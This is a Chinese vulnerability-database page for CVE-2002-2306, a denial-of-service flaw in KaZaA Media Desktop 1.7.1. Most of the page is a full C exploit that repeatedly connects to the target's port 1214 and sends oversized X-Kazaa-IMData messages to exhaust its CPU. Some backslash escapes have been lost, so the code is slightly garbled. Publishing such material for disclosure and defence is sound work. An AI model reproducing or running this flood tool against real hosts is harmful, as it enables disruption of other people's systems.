KaZaA Media Desktop Large Message服务拒绝漏洞
漏洞ID | 1106875 | 漏洞类型 | 资源管理错误 |
发布时间 | 2002-07-25 | 更新时间 | 2002-12-31 |
CVE编号 | CVE-2002-2306 |
CNNVD-ID | CNNVD-200212-311 |
漏洞平台 | Windows | CVSS评分 | 7.8 |
|漏洞来源
|漏洞详情
SharmanNetworksKaZaAMediaDesktop1.7.1版本存在漏洞。远程攻击者通过发送一些超大消息导致服务拒绝(CPU消耗)。
|漏洞EXP
source: http://www.securityfocus.com/bid/5317/info
KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.
/*
kazaa denial of service attack
by Josh and omega
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>
#define PORT 1214
int main(int argc, char *argv[])
{
int fd, numbytes, randnum, k;
struct hostent *host;
struct sockaddr_in them;
char buf2[4026];
char buf[5000];
char *bigboy;
int i, size, j;
memset(buf2, 'a', sizeof(buf2));
buf2[sizeof(buf2)-1]=' ';
srand(time(NULL));
if (argc < 5)
{
fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>n", argv[0]);
exit(1);
}
if ((host=gethostbyname(argv[1])) == NULL)
{
perror("gethostbyname");
exit(1);
}
them.sin_family = AF_INET;
them.sin_port = htons(PORT);
them.sin_addr = *((struct in_addr *)host->h_addr);
memset(&(them.sin_zero), ' ', 8);
size=(4042*atoi(argv[2]))+280+1;
bigboy=(char *)malloc(size);
snprintf(bigboy, size, "GET /.message HTTP/1.1nHost: 68.10.112.148:1214nUserAgent: KazaaClient Jan 18 2002 18:53:21nX-Kazaa-Username: 31337h4x0rnX-Kazaa-Network: KaZaAnX-Kazaa-IP: %d:1214nX-Kazaa-SupernodeIP: %d:1214nConnection: opennX-Kazaa-IMTo: %s@KaZaAnX-Kazaa-IMType: user_textn", randnum, randnum, argv[3]);
/* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %sn", buf2);
for(k=0;k<atoi(argv[2]);k++)
{
strcat(bigboy, buf);
k++;
}
strcat(bigboy, "rnrnrnrnrn");
fprintf(stdout, "done preparing packet... sendingn");
for(i=0, k=0;i<atoi(argv[4]);i++)
{
if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
}
else
{
if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)
{
perror("connect");
}
else
{
printf("sending %d messagen", k);
write(fd, bigboy, strlen(bigboy));
k++;
close(fd);
}
}
}
fprintf(stdout, "n%d out of %d attempted got throughn", k, i);
free(bigboy);
return 0;
}
|参考资料
来源:BID
名称:5317
链接:http://www.securityfocus.com/bid/5317
来源:XF
名称:kazaa-large-msg-dos(9672)
链接:http://xforce.iss.net/xforce/xfdb/9672
相关推荐: Elm Alternative-Folder Buffer Overflow Vulnerability
Elm Alternative-Folder Buffer Overflow Vulnerability 漏洞ID 1103410 漏洞类型 Boundary Condition Error 发布时间 2001-02-13 更新时间 2001-02-13 CV…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666